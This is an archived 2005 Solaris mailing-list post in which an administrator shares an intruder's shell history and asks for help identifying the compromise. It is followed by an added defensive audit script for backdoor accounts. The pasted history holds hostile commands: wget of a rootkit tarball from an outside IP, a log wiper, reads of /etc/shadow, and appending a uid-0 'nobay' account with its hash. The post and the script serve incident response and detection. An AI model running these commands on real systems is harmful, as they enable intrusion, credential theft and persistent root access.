Rootkit attack?

From: Rami Aubourg-Kaires (rami.aubourg@ifrance.com)
Date: Thu Feb 03 2005 - 05:43:56 EST


Hello, managers,

At a remote site with an old Solaris box, we had a problem: we were unable to
connect through telnet (connection, welcome message, but immediate cutoff
before being able to enter the login), and the user at the other end saw
strange behaviour when trying to log in on CDE. He could log in through
failsafe, though.

After investigation, here's what we found in .sh_history:

************************

unset HISTFILE;id;uname -a;uptime;
  unset REMOTEHOST
  cd /tmp
   ls
  wget
  ps -fe
  ftp 202.198.192.125
   chmod 777 wget
  mv wget /usr/bin/
   wget
  wget http://62.211.68.12/killoloz/bads.tar
  tar -xvf bads.tar
   w
   cd bads
   ./setup
   ls
  cd /usr/lib/libX.a
  ./wipe .
  ls
  cd /tmp
   ls
  rm bads.tar
   cat /etc/hosts
  cat /etc/shadow
   /sbin/ifconfig -a
   ps -fe
  cat /etc/shadow
   echo "nobay:XkhkVD0krghB2:12664::::::" >> /etc/shadow
   cat /etc/passwd
   echo "nobay:x:0:1::/:/sbin/sh" >> /etc/passwd
   exit

************************

In shadow and passwd, there was indeed this entry for nobay.
http://62.211.68.12/ is an Italian meeting site. There is indeed a
bads.tar file in the specified folder.
ftp 202.198.192.125 goes to a Solaris 8 machine.

The box is offline now, the entries deleted, and the matter investigated,
since it has been compromised. However, I can't find any info on this
worm. Has anyone had any experience with it? If verified, to which
authority should I report the attack?

Rami

_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers
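The history above shows two things done to the account database (a second uid-0 login appended to /etc/passwd, and a matching hash appended to /etc/shadow) plus a directory named like a static library (/usr/lib/libX.a) holding the kit. The following is an added example, not code from the original post or from the sunmanagers list: a small POSIX sh/awk audit that looks for exactly those traces. It assumes POSIX sh, awk, find and mktemp; the sample passwd and shadow files are constructed here to illustrate the checks, with the nobay lines taken from the post and placeholder hashes elsewhere. Because the history also shows a setup script and a log wiper (`./wipe .`), the box's own `ls`, `ps` and `find` cannot be trusted; run these checks from failsafe boot, as the poster did, or against a copied /etc, which is why the file paths are parameters.

```sh
#!/bin/sh
# Added example (not from the original post): audit passwd/shadow and a
# library directory for the traces left by the attacker history above.
# Assumed tools: POSIX sh, awk, find, mktemp. File paths are arguments so
# the same checks run on an offline copy of a compromised box's /etc.

# Logins with uid 0 other than root. A second uid-0 login is the classic
# passwd backdoor ("nobay:x:0:1::/:/sbin/sh" in the post).
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Logins present in one of passwd/shadow but not the other. An attacker
# who appends to one file and forgets the other, or a partial cleanup,
# leaves this kind of orphan. Output is sorted so it is stable.
find_orphans() {
    awk -F: 'FNR == NR { p[$1] = 1; next }
             !($1 in p) { print "shadow-only:" $1 }
             { s[$1] = 1 }
             END { for (n in p) if (!(n in s)) print "passwd-only:" n }' \
        "$1" "$2" | sort
}

# Shadow entries whose lastchg field (days since 1970-01-01) is at or
# after a threshold day. 12664 in the post is 2004-09-03 UTC, but the
# value is whatever the attacker echoed in, so treat it as a hint only.
shadow_changed_since() {
    awk -F: -v d="$2" '$3 != "" && $3 + 0 >= d + 0 { print $1 }' "$1"
}

# Directories whose names look like libraries (the kit lived in a
# directory called /usr/lib/libX.a). Real libraries are files, not dirs.
find_library_dirs() {
    find "$1" -type d \( -name '*.a' -o -name '*.so*' \) -print | sort
}

# --- Constructed sample data (not from any real system) ---------------
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
SAMPLE_PASSWD="$SAMPLE_DIR/passwd"
SAMPLE_SHADOW="$SAMPLE_DIR/shadow"

cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
jdoe:x:1001:10:John Doe:/export/home/jdoe:/bin/ksh
nobay:x:0:1::/:/sbin/sh
EOF

# Hashes for legitimate users are placeholders; the nobay hash is the
# one shown in the post.
cat > "$SAMPLE_SHADOW" <<'EOF'
root:REDACTED:12000::::::
daemon:NP:6445::::::
bin:NP:6445::::::
nobody:NP:6445::::::
lp:NP:6445::::::
jdoe:REDACTED:12100::::::
nobay:XkhkVD0krghB2:12664::::::
EOF

# A fake /usr/lib with one real library file and one kit directory.
mkdir -p "$SAMPLE_DIR/usr/lib/libX.a"
: > "$SAMPLE_DIR/usr/lib/libc.a"

# --- Stand-alone run --------------------------------------------------
printf 'Extra uid-0 logins:\n';   find_extra_uid0 "$SAMPLE_PASSWD"
printf 'passwd/shadow orphans:\n'; find_orphans "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"
printf 'Shadow changed since day 12500:\n'
shadow_changed_since "$SAMPLE_SHADOW" 12500
printf 'Directories named like libraries:\n'
find_library_dirs "$SAMPLE_DIR/usr/lib"
```

To pick a threshold for `shadow_changed_since`, use the day number of the last legitimate password change; today's day number is `expr "$(date +%s)" / 86400` on systems whose `date` supports `%s` (it is not in POSIX, so on an old Solaris compute it another way). None of these checks proves a box is clean: a kit that replaces `ls`, `ps` or `find` hides from the live system, and an attacker who keeps uid 0 via a setuid binary instead of a passwd entry is invisible to the passwd checks.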



This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 23:30:06 EDT